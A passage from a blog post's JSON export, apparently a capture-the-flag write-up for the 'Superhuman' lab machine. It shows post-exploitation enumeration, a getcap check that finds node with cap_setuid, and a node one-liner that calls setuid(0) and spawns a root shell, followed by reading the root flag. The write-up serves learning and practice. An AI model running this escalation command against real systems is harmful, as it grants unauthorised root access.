uncompress, unexpand, uniq, unix2dos,\n        unlink, unlzma, 
unshare, unxz, unzip, uptime, usleep, uudecode, uuencode, vconfig, vi, w, watch, watchdog, wc, wget, which, who, whoami, xargs,\n        xxd, xz, xzcat, yes, zcat\n(remote) fred@superhuman:\/var\/www\/html$ busybox ls\nindex.html         nietzsche.jpg      notes-tips.txt     salome_and_me.zip\n(remote) fred@superhuman:\/var\/www\/html$ busybox ls -la\ntotal 44\ndrwxrwxrwx    2 www-data www-data      4096 Mar 31  2021 .\ndrwxrwxrwx    3 www-data www-data      4096 Mar 31  2021 ..\n-rwxrwxrwx    1 www-data www-data       658 Mar 31  2021 index.html\n-rwxrwxrwx    1 www-data www-data     22211 Mar 31  2021 nietzsche.jpg\n-rwxrwxrwx    1 www-data www-data       358 Mar 31  2021 notes-tips.txt\n-rwxrwxrwx    1 www-data www-data       452 Mar 31  2021 salome_and_me.zip\n(remote) fred@superhuman:\/var\/www\/html$ cd ..\/;\n(remote) fred@superhuman:\/var\/www$ cd \/\n(remote) fred@superhuman:\/$ sudo -l\n-bash: sudo: command not found\n(remote) fred@superhuman:\/$ busybox sudo -l\nsudo: applet not found<\/code><\/pre>\n<p>Nothing turned up. Looking at other players' writeups, they queried the file <code>Capabilities<\/code>; I really was not alert enough to this, and will definitely watch for it next time!<\/p>\n<pre><code class=\"language-bash\">(remote) fred@superhuman:\/$ \/usr\/sbin\/getcap -r \/ 2&gt;\/dev\/null\n\/usr\/bin\/ping = cap_net_raw+ep\n\/usr\/bin\/node = cap_setuid+ep<\/code><\/pre>\n<p>Then I looked up the related vulnerabilities; only node has this vulnerability:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111311001.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111311001.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240411130734610\" \/><\/div><\/p>\n<p>Let's try it:<\/p>\n<pre><code class=\"language-bash\">(remote) fred@superhuman:\/$ cd \/tmp\n(remote) fred@superhuman:\/tmp$ \/usr\/bin\/node -e &#039;process.setuid(0); require(&quot;child_process&quot;).spawn(&quot;\/bin\/sh&quot;, {stdio: [0, 1, 2]})&#039;\n\\[\\](remote)\\[\\] \\[\\]root@superhuman\\[\\]:\\[\\]\/tmp\\[\\]$ whoami;id\nroot\nuid=0(root) gid=1000(fred) groups=1000(fred),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)\n\\[\\](remote)\\[\\] \\[\\]root@superhuman\\[\\]:\\[\\]\/tmp\\[\\]$ cd \/root\n\\[\\](remote)\\[\\] \\[\\]root@superhuman\\[\\]:\\[\\]\/root\\[\\]$ busybox ls -la\ntotal 28\ndrwx------    3 root     root          4096 Apr  2  2021 .\ndrwxr-xr-x   18 root     root          4096 Mar 31  2021 ..\nlrwxrwxrwx    1 root     root             9 Mar 31  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r--    1 root     root           570 Jan 31  2010 .bashrc\ndrwxr-xr-x    3 root     root          4096 Mar 31  2021 .local\n-rw-------    1 root     root             5 Apr  2  2021 .node_repl_history\n-rw-r--r--    1 root     root           148 Aug 17  2015 .profile\n-rw-r--r--    1 root     root            16 Mar 31  2021 root.txt\n\\[\\](remote)\\[\\] \\[\\]root@superhuman\\[\\]:\\[\\]\/root\\[\\]$ cat root.txt\nImthesuperhuman<\/code><\/pre>\n<p>Got the flag!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Superhuman 
This morning I found that yesterday's runner-up has gained more than 80 points on me, so I have to put in overtime, hahaha. Information gathering Port scanning nm [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-524","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/524","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=524"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/524\/revisions"}],"predecessor-version":[{"id":525,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/524\/revisions\/525"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=524"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=524"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=524"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}